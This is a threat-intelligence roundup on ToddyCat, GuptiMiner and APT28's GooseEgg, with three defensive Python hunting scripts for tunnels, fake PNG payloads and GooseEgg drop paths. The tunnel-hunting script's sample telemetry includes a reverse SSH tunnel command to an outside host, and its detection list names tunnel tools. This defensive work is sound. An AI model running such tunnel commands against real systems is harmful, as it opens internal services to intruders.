CTI Roundup: ToddyCat APT, GuptiMiner Malware, APT28 Exploits a Windows Print Spooler Flaw
ToddyCat deploys advanced tools for industrial scale data theft, hackers use eScan updates to spread GuptiMiner malware, and Russia’s APT28 exploits a Windows Print Spooler flaw
In this week’s roundup, CTI looks at a threat actor known as ToddyCat, which has been observed maintaining several simultaneous tunnels into victim environments to persist and steal data on an industrial scale. Next, CTI investigates GuptiMiner, a campaign by a North Korean threat actor with possible ties to Kimsuky that hijacks eScan antivirus updates. Finally, CTI explains how Russia’s APT28 is exploiting an older Windows Print Spooler vulnerability to deploy a previously unknown hacking tool called GooseEgg.
1. ToddyCat deploys advanced tools for industrial-scale data theft
A threat actor known as ToddyCat was recently observed leveraging simultaneous connections to victim environments to maintain persistence and steal data.
The campaign makes use of several different tools, a number of which had not previously been attributed to ToddyCat. Researchers at Kaspersky have broken down the tools used by the actor in this latest campaign.
ToddyCat’s traffic tunneling tools
ToddyCat had multiple tunnels to the infected infrastructure, each implemented via different tools to persist in the environment even if one tunnel is taken down. This constant access to the infrastructure enabled the actor to perform aggressive reconnaissance.
- Reverse SSH tunnel: ToddyCat was observed using a reverse SSH tunnel to access remote services.
- SoftEther VPN: ToddyCat also used the server utility from the SoftEther VPN package for tunneling. In most cases, the actor renamed the digitally signed VPN server executable to hide its purpose on the system.
- Ngrok agent and Krong: In some cases, the actor tunneled through a legitimate cloud provider to reach the compromised infrastructure. According to Kaspersky, Ngrok is “a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa.” Ngrok was installed on several hosts and used to redirect C2 traffic from the cloud infrastructure to a specified port on those hosts. That port was the same one another tool, Krong, listens on. Krong is a DLL that is side-loaded by a digitally signed AVG TuneUp executable, so the malicious code runs under the cover of a legitimate signed process.
- FRP client: After establishing several tunnels via the above methods, the threat actor installed the FRP client. This client is a reverse proxy that grants access from the internet to a local server behind a NAT or firewall.
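The layered-tunnel pattern above (several independent tunnel tools on one host, at least one of them a renamed signed binary) is something a hunter can look for in process-creation telemetry. The script below is an added example, not code from Kaspersky/Securelist or Tanium: the event fields mirror Sysmon Event ID 1 (Host, Image, OriginalFileName, CommandLine), the sample events are constructed, and the OriginalFileName values in TUNNEL_TOOLS are assumptions about each tool’s PE version info (Go-built ngrok and frpc releases may carry none, in which case hash or command-line matching has to take over).

```python
"""Hunt for layered tunnels of the kind described above in process telemetry.

Added example, not code from Kaspersky/Securelist or Tanium. Event fields
mirror Sysmon Event ID 1; sample events are constructed; the
OriginalFileName values below are assumptions.
"""
import re
from collections import defaultdict

# PE OriginalFileName -> tool family (assumed values).
TUNNEL_TOOLS = {
    "vpnserver.exe": "SoftEther VPN server",
    "ngrok.exe": "ngrok agent",
    "frpc.exe": "FRP client",
    "ssh.exe": "OpenSSH client",
}
REVERSE_SSH = re.compile(r"\s-[A-Za-z]*R\b")   # -R, -NR, -fNR ...


def analyze_event(ev):
    """Return (tool_family or None, list of finding strings) for one event."""
    orig = (ev.get("OriginalFileName") or "").lower()
    image = ev["Image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    family = TUNNEL_TOOLS.get(orig)
    if family is None:
        return None, []
    if orig == "ssh.exe" and not REVERSE_SSH.search(cmd):
        return None, []          # interactive ssh without -R is not a reverse tunnel
    findings = [f"{ev['Host']}: {family} started as {image}"]
    if image != orig:
        # the report notes the signed SoftEther server was renamed on disk
        findings.append(f"{ev['Host']}: {family} renamed to {image} "
                        f"(OriginalFileName={orig})")
    return family, findings


def hunt(events, min_families=2):
    """Return (findings, hosts running >= min_families distinct tunnel tools)."""
    per_host = defaultdict(set)
    findings = []
    for ev in events:
        family, f = analyze_event(ev)
        findings.extend(f)
        if family:
            per_host[ev["Host"]].add(family)
    layered = {h: sorted(fams) for h, fams in per_host.items()
               if len(fams) >= min_families}
    return findings, layered


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"Host": "srv01", "Image": r"C:\Windows\Temp\svchost.exe",
     "OriginalFileName": "vpnserver.exe", "CommandLine": "svchost.exe /install"},
    {"Host": "srv01", "Image": r"C:\ProgramData\ngrok.exe",
     "OriginalFileName": "ngrok.exe", "CommandLine": "ngrok.exe tcp 5000"},
    {"Host": "srv01", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "OriginalFileName": "ssh.exe",
     "CommandLine": "ssh.exe -fNR 2222:127.0.0.1:3389 user@203.0.113.5"},
    {"Host": "ws07", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "OriginalFileName": "ssh.exe", "CommandLine": "ssh.exe user@gitserver"},
    {"Host": "ws07", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "OriginalFileName": "WinRAR.exe", "CommandLine": "WinRAR.exe x backup.rar"},
]

if __name__ == "__main__":
    found, layered = hunt(SAMPLE_EVENTS)
    print("\n".join(found))
    print("layered tunnels:", layered)
```

The per-host aggregation is the part that matters: a single ngrok agent on a developer box is noise, but three different tunnel families on one server, one of them a SoftEther server masquerading as svchost.exe, is the ToddyCat pattern the report describes.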
Data collection tools
ToddyCat has also been observed using various data collection tools, each serving a different purpose.
- Cuthead: A new tool used to search for documents. Its name was taken from the file description field of the sample identified by Securelist. The tool is compiled .NET code that searches for files matching specific extensions or containing specific words and stores the results in an archive.
- WAExp: A WhatsApp data stealer written in .NET that targets the web version of WhatsApp. The web version stores data about a user including profile details, chat data, the phone numbers of contacts chatted with, and current session data.
- TomBerBil: The actor was also observed using a tool called TomBerBil to steal passwords from browsers.
Analyst comments from Tanium’s Cyber Threat Intelligence team
ToddyCat clearly spent a lot of time thinking about the best way to persist within an environment, landing on the use of several tunnels in the event one gets discovered and cut off.
This approach, along with the use of several data collection tools, requires more maintenance and overhead. But it can prove to be rather effective, especially if new or custom tools are included in the mix.
2. Hackers use eScan updates to spread GuptiMiner malware
A North Korean threat actor with possible ties to the Kimsuky APT group was observed exploiting the updating mechanism of eScan antivirus.
The threat actor obtained an adversary-in-the-middle (AitM) position to hijack and replace the legitimate eScan update package. The attack seeks to plant backdoors and deliver cryptocurrency miners via the GuptiMiner malware.
The infection chain
The infection chain begins when eScan requests an update from its update server. An adversary-in-the-middle intercepts the request and substitutes a malicious update package for the legitimate one. eScan then unpacks and loads this package, during which a malicious DLL is side-loaded that enables the rest of the chain.
- Stage 0 – installation process: The actors behind this campaign used an AitM position to deliver an infected installer to the victim’s device in place of the legitimate eScan update. At this time, there are limited details available as to how the threat actor obtained that AitM position.
- Stage 0.9 – installation improvements: The installation process has been refined over time and is significantly different now than the original. Now the threat actor is using scheduled tasks, WMI events, different next stages, disabling Windows Defender, and installing certificates to Windows.
- Stage 1 – PNG loader: A PE file executed in stage 0 will serve as a dropper in this stage and additional stages by contacting the threat actor’s malicious DNS server. An obtained response contains an encrypted URL of the real C2 server from which the malware will request an additional PNG image payload. This PNG payload contains a shellcode that provides additional functionality later on.
- Stage 2 – Gzip loader: This is the shortest stage in which the Gzip loader will decompress another shellcode via Gzip, executing it in a separate thread. This thread will load stage 3. Throughout various GuptiMiner operations, Gzip loader has not been changed.
- Stage 3 – Puppeteer: This stage orchestrates the key functionality of the malware, including the cryptocurrency mining and the deployment of backdoors. Puppeteer monitors the system for running processes every 5 seconds, killing analysis tools including taskmgr, Autoruns, Wireshark, Wireshark-gtk, and TCPView. The malware checks a DNS server registry key to determine whether the machine is a Windows server. It then obtains the number of computers joined to the domain and tries to download an additional PNG payload.
- Stage 4 – backdoor: Two types of backdoors are deployed by GuptiMiner. The first is based on a custom build of PuTTY with added local SMB scanning to enable lateral movement. The second first scans for locally stored private keys and crypto wallets and then injects a modular backdoor in the form of shellcode.
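Two of the stages above turn on a “PNG image” that is really a shellcode carrier. A loader that does this either appends its payload after the IEND chunk or simply prefixes a PNG signature onto non-image bytes, and in both cases the container’s chunk structure (length, type, data, CRC-32, terminated by IEND) no longer holds. The parser below checks exactly that. It is an added example, not Avast’s or Tanium’s code, and the sample images it tests are constructed here rather than taken from the campaign.

```python
"""Tell a real PNG from a PNG-shaped shellcode carrier.

Added example; not Avast's or Tanium's code. The sample images are
constructed here.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def parse_png(data):
    """Walk the chunk list; report CRC errors, truncation and bytes after IEND."""
    r = {"signature_ok": data[:8] == PNG_SIG, "chunks": [], "bad_crc": [],
         "truncated": False, "saw_iend": False, "trailing": 0}
    if not r["signature_ok"]:
        return r
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length                 # 4 len + 4 type + data + 4 crc
        if end > len(data):
            r["truncated"] = True               # length field runs off the end
            break
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[end - 4:end])[0]
        name = ctype.decode("latin-1")
        r["chunks"].append(name)
        if zlib.crc32(ctype + body) != crc:     # CRC covers type + data
            r["bad_crc"].append(name)
        pos = end
        if ctype == b"IEND":
            r["saw_iend"] = True
            break
    if r["saw_iend"]:
        r["trailing"] = len(data) - pos         # bytes after IEND are not image data
    return r


def suspicious(data):
    """Return the reasons the blob is not a well-formed PNG (empty list = clean)."""
    r = parse_png(data)
    if not r["signature_ok"]:
        return ["bad signature"]
    reasons = []
    if r["truncated"]:
        reasons.append("truncated chunk")
    if not r["saw_iend"]:
        reasons.append("no IEND chunk")
    reasons.extend(f"crc mismatch in {name}" for name in r["bad_crc"])
    if r["trailing"]:
        reasons.append(f"trailing data after IEND: {r['trailing']} bytes")
    return reasons


# --- constructed samples --------------------------------------------------
def _chunk(ctype, body):
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def make_png(width=1, height=1):
    """Minimal valid 8-bit RGB PNG (filter byte 0 per scanline, black pixels)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


CLEAN = make_png()
APPENDED = make_png() + b"\x90" * 16 + b"\xcc"    # stand-in for appended shellcode
HEADER_ONLY = PNG_SIG + bytes(range(64))           # PNG signature over non-PNG bytes
CRC_TAMPERED = bytearray(CLEAN)
CRC_TAMPERED[20] ^= 1                              # flip a byte inside IHDR data
CRC_TAMPERED = bytes(CRC_TAMPERED)

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN), ("appended", APPENDED),
                        ("header_only", HEADER_ONLY), ("crc_tampered", CRC_TAMPERED)]:
        print(label, suspicious(blob) or "ok")
```

Run against proxy captures or sandbox downloads, any “image” that fails these checks is worth a second look; a real decoder would happily display the clean part of APPENDED and never tell you about the 17 bytes after IEND.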
Analyst comments from Tanium’s Cyber Threat Intelligence team
This threat actor displays a high level of sophistication, leveraging a range of stages, functions, and tools up until the final payload distribution.
The attack also ends in the distribution of XMRig, which, as Avast points out, “is a bit unexpected for such a thought-through operation,” given that it is easily detected.
The overlaps in infrastructure and TTPs with the notorious Kimsuky actor raise the assessed severity of this threat.
3. APT28 exploits a Windows Print Spooler flaw
Microsoft is warning that Russian APT28 is exploiting an older Windows Print Spooler vulnerability to deploy a previously unknown hacking tool called GooseEgg.
APT28 is believed to have been using GooseEgg since at least mid-2020. The tool exploits CVE-2022-38028, a privilege-escalation flaw in the Print Spooler service that Microsoft patched in October 2022. It is used to spawn specific applications at the command line with elevated permissions, enabling the actor to carry out various post-compromise activities.
APT28: A refresher
APT28 — which is also tracked as Forest Blizzard by Microsoft — often leverages publicly available exploits in its attacks.
The APT has been linked to the Russian General Staff Main Intelligence Directorate (GRU) and as such carries out attacks that focus on strategic intelligence gathering. The actor’s use of GooseEgg malware is a new discovery.
How APT28 uses GooseEgg
- APT28 uses GooseEgg to obtain elevated access and steal information from the targeted system.
- The tool is used after obtaining initial access to the device.
- GooseEgg has been observed being deployed with a batch script named either execute.bat or doit.bat.
- The script writes a file containing commands to save off and compress registry hives. The script then invokes the GooseEgg executable and establishes persistence via a scheduled task that runs the written file.
A closer look at the GooseEgg binary
The GooseEgg binary has had several names across various attacks including justice.exe and DefragmentSrv.exe.
The binary accepts one of four commands, each with a different run path.
- The first command will issue a custom return code and exit.
- The next two commands will trigger the exploit and will launch a DLL or an executable with elevated privileges.
- The final command will test the exploit, confirming that it has succeeded via the whoami command.
According to Microsoft, the name of the embedded malicious DLL file often includes the phrase “wayzgoose.” The DLL is deployed within one of several installation subdirectories under C:\ProgramData, including Microsoft, Adobe, Comms, Intel, Kaspersky Lab, Bitdefender, ESET, NVIDIA, UbiSoft, and Steam.
A further subdirectory with a randomly generated name is created inside the vendor folder and acts as the install directory. Microsoft’s example of such a directory is C:\ProgramData\Adobe\v2.116.4405. Registry keys are then created to register a new CLSID.
The exploit replaces the C: drive symbolic link in the object manager so that it points to the previously created directory. When the Print Spooler service then attempts to load certain components from their normal C: paths, it is redirected to the actor-controlled directory instead.
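The drop locations and file names described above can be turned into a simple hunt over a file listing. The script below is an added example, not Microsoft’s or Tanium’s code: the vendor folder names, the “wayzgoose” DLL substring, the script names execute.bat and doit.bat and the binary names justice.exe and DefragmentSrv.exe come from the description above, while treating the install subdirectory as version-like (in the shape of v2.116.4405) is an assumption drawn from the single published example and is therefore scored low. The sample paths, including the DLL name wayzgoose23.dll, are constructed.

```python
"""Hunt for GooseEgg drop locations in a file listing.

Added example; not Microsoft's or Tanium's code. Indicator names come from
the roundup text; the version-like directory pattern is an assumption;
sample paths are constructed.
"""
import os
import re

VENDOR_DIRS = {"microsoft", "adobe", "comms", "intel", "kaspersky lab",
               "bitdefender", "eset", "nvidia", "ubisoft", "steam"}
NAME_IOCS = {"execute.bat", "doit.bat", "justice.exe", "defragmentsrv.exe"}
VERSION_DIR = re.compile(r"^v\d+(\.\d+){1,3}$")       # assumption, see lead-in
SEVERITY = {"high": 0, "medium": 1, "low": 2}


def _parts(path):
    return [p for p in path.replace("/", "\\").lower().split("\\") if p]


def score_path(path):
    """Return (severity, reason) for a suspicious path, else None."""
    parts = _parts(path)
    name = parts[-1]
    if name.endswith(".dll") and "wayzgoose" in name:
        return ("high", f"wayzgoose DLL: {path}")
    if name in NAME_IOCS:
        return ("medium", f"GooseEgg file name: {path}")
    # Layout C:\ProgramData\<vendor>\v<x.y.z>\*.dll (the install directory)
    if "programdata" not in parts:
        return None
    i = parts.index("programdata")
    if (len(parts) == i + 4 and parts[i + 1] in VENDOR_DIRS
            and VERSION_DIR.match(parts[i + 2]) and name.endswith(".dll")):
        return ("low", f"DLL in version-like directory under vendor folder: {path}")
    return None


def hunt(paths):
    """Score every path and return the hits ordered by severity."""
    hits = [h for h in map(score_path, paths) if h]
    return sorted(hits, key=lambda h: SEVERITY[h[0]])


def hunt_disk(root):
    """Walk a real tree (for example C:\\ProgramData) and score every file."""
    paths = []
    for d, _, files in os.walk(root):
        paths.extend(os.path.join(d, f) for f in files)
    return hunt(paths)


SAMPLE_PATHS = [  # constructed, not observed
    r"C:\ProgramData\Adobe\v2.116.4405\wayzgoose23.dll",
    r"C:\ProgramData\Adobe\v2.116.4405\justice.exe",
    r"C:\Users\Public\doit.bat",
    r"C:\ProgramData\Intel\v1.2.3.4\helper.dll",
    r"C:\ProgramData\Adobe\ARM\1.0\Setup.exe",
    r"C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll",
]

if __name__ == "__main__":
    for sev, reason in hunt(SAMPLE_PATHS):
        print(sev.upper(), reason)
```

The low-severity rule will fire on legitimate vendor software, which is why it is a lead rather than an alert; a wayzgoose DLL or one of the known batch names in the same directory is what turns it into a finding. On a live host, pair this with a check of the object manager’s C: symbolic link target (WinObj shows it) and a review of scheduled tasks created around the time of the drop.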
Analyst comments from Tanium’s Cyber Threat Intelligence team
Timely patching is the best defense against APT28. The actor is known to exploit vulnerabilities rather quickly after they are publicly disclosed.
In the last few months, the actor has been seen exploiting a vulnerability in Microsoft Outlook (CVE-2023-23397) and a vulnerability in WinRAR (CVE-2023-38831), for example. The group’s readiness to fold public exploits into its attacks is surely part of the reason it has remained active for over a decade.